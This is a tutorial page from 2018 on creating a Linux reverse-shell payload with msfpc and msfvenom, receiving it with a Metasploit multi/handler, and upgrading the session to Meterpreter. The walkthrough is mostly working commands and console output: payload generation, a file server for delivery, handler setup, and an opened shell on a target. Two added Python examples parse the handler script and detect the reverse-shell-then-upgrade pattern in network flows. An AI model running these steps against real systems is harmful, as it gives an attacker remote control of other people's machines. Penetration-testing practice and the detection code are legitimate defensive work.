====== Reverse shell with Metasploit ======
Jorge Pinilla López
2018/06/13
We are going to create a reverse shell and use it by means of a payload, Metasploit and Meterpreter.
===== Creating the payload =====
To create the payload we will use msfvenom, but to keep things simple we will use msfpc, a wrapper that makes payload creation easier. (https://github.com/g0tmi1k/mpc)
Default options:
* Port 443
* MSF
* REVERSE
* STAGELESS
* TCP
Usage example:
./msfpc.sh Linux
[*] MSFvenom Payload Creator (MSFPC v1.4.4)
[i] Use which interface - IP address?:
[i] 1.) eth0 - 192.168.122.59
[i] 2.) eth1 - 192.168.200.10
[i] 3.) lo - 127.0.0.1
[i] 4.) wan - 83.42.174.42
[?] Select 1-4, interface or IP address: 2
[i] IP: 192.168.200.10
[i] PORT: 443
[i] TYPE: linux (linux/x86/shell/reverse_tcp)
[i] CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf \
--platform linux -a x86 -e generic/none LHOST=192.168.200.10 LPORT=443 \
> '/home/jorpilo/git/linux-shell-staged-reverse-tcp-443.elf'
[i] linux shell created: '/home/user/git/linux-shell-staged-reverse-tcp-443.elf'
[i] MSF handler file: '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
[i] Run: msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
[?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
[*] Done!
Payloads that can be generated:
* APK
* ASP
* ASPX
* Bash [.sh]
* Java [.jsp]
* Linux [.elf]
* OSX [.macho]
* Perl [.pl]
* PHP
* Powershell [.ps1]
* Python [.py]
* Tomcat [.war]
* Windows [.exe / .dll]
This generates two files:
* linux-shell-staged-reverse-tcp-443.elf
File that the target must execute
* linux-shell-staged-reverse-tcp-443-elf.rc
Handler file (resource script) for Metasploit's multi/handler
==== Tips ====
Start a quick file server in the current directory
python2 -m SimpleHTTPServer 8080
Run Metasploit with everything already configured
# Copied from the msfpc output
sudo msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
===== Creating the handler =====
Using the resource script generated by msfpc
bash$> sudo msfconsole -q -r '/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc'
[*] Processing /home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc for ERB directives.
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> use exploit/multi/handler
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set LHOST 192.168.200.10
LHOST => 192.168.200.10
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set LPORT 443
LPORT => 443
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> set ExitOnSession false
ExitOnSession => false
resource (/home/user/git/linux-shell-staged-reverse-tcp-443-elf.rc)> run -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.200.10:443
This configures the handler and launches it as background job 0.
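The handler resource script above is just a list of console commands. As an added example (not part of msfpc or Metasploit), this parser turns such a script into a summary and classifies the payload as staged or stageless from its name; the sample script is constructed from the commands shown above.

```python
"""Parse a Metasploit handler resource (.rc) script into a summary.

Added example, not msfpc's or Metasploit's own code. It reads the console
commands the handler .rc contains (use / set / run) and tells a staged
payload (stage and stager as separate path components, e.g.
linux/x86/shell/reverse_tcp) from a stageless one (linux/x86/shell_reverse_tcp).
Lines other than use/set/run, such as <ruby> blocks, are ignored.
"""
from collections import OrderedDict

# Constructed sample: the same commands msfpc emitted for the handler above.
SAMPLE_RC = """\
# handler generated by msfpc
use exploit/multi/handler
set PAYLOAD linux/x86/shell/reverse_tcp
set LHOST 192.168.200.10
set LPORT 443
set ExitOnSession false
run -j
"""

# Common Metasploit stage names that appear as the second-to-last component
# of a staged payload path (assumed short list, not exhaustive).
STAGE_NAMES = {"shell", "meterpreter", "vncinject", "dllinject", "upexec"}


def payload_is_staged(payload: str) -> bool:
    """True for '.../<stage>/<stager>', False for '.../<stage>_<conn>' or single payloads."""
    parts = payload.split("/")
    return len(parts) >= 2 and parts[-2] in STAGE_NAMES


def parse_handler_rc(text: str) -> dict:
    """Return module, options, run line, listener tuple and staged flag."""
    summary = {"module": None, "options": OrderedDict(), "run": None, "staged": None}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        verb, _, rest = line.partition(" ")
        if verb == "use":
            summary["module"] = rest.strip()
        elif verb == "set":
            key, _, value = rest.strip().partition(" ")
            summary["options"][key] = value.strip()
        elif verb in ("run", "exploit"):
            summary["run"] = line
    payload = summary["options"].get("PAYLOAD")
    if payload:
        summary["staged"] = payload_is_staged(payload)
    summary["listener"] = (summary["options"].get("LHOST"), summary["options"].get("LPORT"))
    return summary
```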
msf exploit(multi/handler) > threads
Background Threads
==================
ID  Status  Critical  Name                             Started
--  ------  --------  ----                             -------
0   sleep   False     JobID(0)-Exploit: multi/handler  2018-06-13 23:05:25 +0200
1   sleep   True      SessionScheduler-1               2018-06-13 23:05:25 +0200
2   sleep   True      SessionScheduler-2               2018-06-13 23:05:25 +0200
3   sleep   True      SessionScheduler-3               2018-06-13 23:05:25 +0200
4   sleep   True      SessionScheduler-4               2018-06-13 23:05:25 +0200
5   sleep   True      SessionScheduler-5               2018-06-13 23:05:25 +0200
6   sleep   True      SessionManager                   2018-06-13 23:05:25 +0200
7   sleep   False     ReverseTcpHandlerListener-443    2018-06-13 23:05:25 +0200
8   sleep   False     ReverseTcpHandlerWorker-443      2018-06-13 23:05:25 +0200
When the target runs the file, a new session is created in Metasploit. To list the sessions:
msf exploit(multi/handler) >
[*] Sending stage (36 bytes) to 192.168.200.164
[*] Command shell session 1 opened (192.168.200.10:443 -> 192.168.200.164:42480) at 2018-06-13 23:08:29 +0200
msf exploit(multi/handler) > sessions -l
Active sessions
===============
Id  Name  Type             Information  Connection
--  ----  ----             -----------  ----------
1         shell x86/linux               192.168.200.10:443 -> 192.168.200.164:42480 (192.168.200.164)
As we can see, it is a Linux shell session. To interact with the session we run
msf exploit(multi/handler) > sessions -i 1
and we will have a shell on the target machine.
===== Meterpreter =====
Let's go one step further and upgrade that shell session into a Meterpreter session. To do so:
msf exploit(multi/handler) > use post/multi/manage/shell_to_meterpreter
msf post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
msf post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.200.10:4433
[*] Sending stage (853256 bytes) to 192.168.200.164
[*] Meterpreter session 2 opened (192.168.200.10:4433 -> 192.168.200.164:60144) at 2018-06-13 23:12:34 +0200
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
If we now list the sessions we see both of them, and we can interact with Meterpreter session 2:
msf post(multi/manage/shell_to_meterpreter) > sessions -l
Active sessions
===============
Id  Name  Type                   Information                                                 Connection
--  ----  ----                   -----------                                                 ----------
1         shell x86/linux                                                                    192.168.200.10:443 -> 192.168.200.164:42480 (192.168.200.164)
2         meterpreter x86/linux  uid=1001, gid=1001, euid=1001, egid=1001 @ 192.168.200.164  192.168.200.10:4433 -> 192.168.200.164:60144 (192.168.200.164)
msf post(multi/manage/shell_to_meterpreter) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
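Seen from the network, the session above leaves two traces: a connection to port 443 whose server-to-client payload is only the 36-byte stage (far too small to be a TLS handshake), followed a few minutes later by a second connection from the same host to the same peer on port 4433, opened by shell_to_meterpreter. As an added example (not part of the page or of Metasploit), this detector looks for both signals in flow records; the record format and the flow lines are constructed, modelled on the timestamps shown above.

```python
"""Flag the reverse-shell-then-upgrade pattern in connection flow records.

Added example, not from the page or Metasploit. Signals checked:
  1. a port-443 flow whose server->client byte count is too small for TLS
  2. a second flow to the same peer on another port shortly after a 443 flow
Flow record format is assumed: (start, src, dst, dst_port, bytes_server_to_client).
"""
from collections import defaultdict
from datetime import datetime

# Constructed flow records (203.0.113.5 is a documentation address standing in
# for a normal web server); times follow the session output above.
FLOWS = [
    ("2018-06-13 23:05:10", "192.168.200.164", "203.0.113.5", 443, 48211),       # real TLS
    ("2018-06-13 23:08:29", "192.168.200.164", "192.168.200.10", 443, 36),       # 36-byte stage
    ("2018-06-13 23:12:34", "192.168.200.164", "192.168.200.10", 4433, 853256),  # meterpreter
    ("2018-06-13 23:20:00", "192.168.200.150", "192.168.200.10", 443, 5120),     # single flow
]

MIN_TLS_BYTES = 200      # ServerHello + certificate is well above this
UPGRADE_WINDOW_S = 600   # page shows 443 at 23:08:29, 4433 at 23:12:34 (245 s)


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def find_suspicious_reverse_shells(flows, window_s=UPGRADE_WINDOW_S):
    """Return a list of (src, dst, reason) alerts."""
    alerts = []
    by_pair = defaultdict(list)
    for start, src, dst, port, rx in flows:
        by_pair[(src, dst)].append((_ts(start), port, rx))
        if port == 443 and rx < MIN_TLS_BYTES:
            alerts.append((src, dst, f"port 443 flow returned only {rx} bytes, not TLS"))
    for (src, dst), conns in by_pair.items():
        conns.sort()  # chronological order per (src, dst) pair
        for (t1, p1, _), (t2, p2, _) in zip(conns, conns[1:]):
            gap = int((t2 - t1).total_seconds())
            if p1 == 443 and p2 != 443 and gap <= window_s:
                alerts.append((src, dst, f"second connection on port {p2} {gap}s after port 443"))
    return alerts


if __name__ == "__main__":
    for src, dst, reason in find_suspicious_reverse_shells(FLOWS):
        print(f"{src} -> {dst}: {reason}")
```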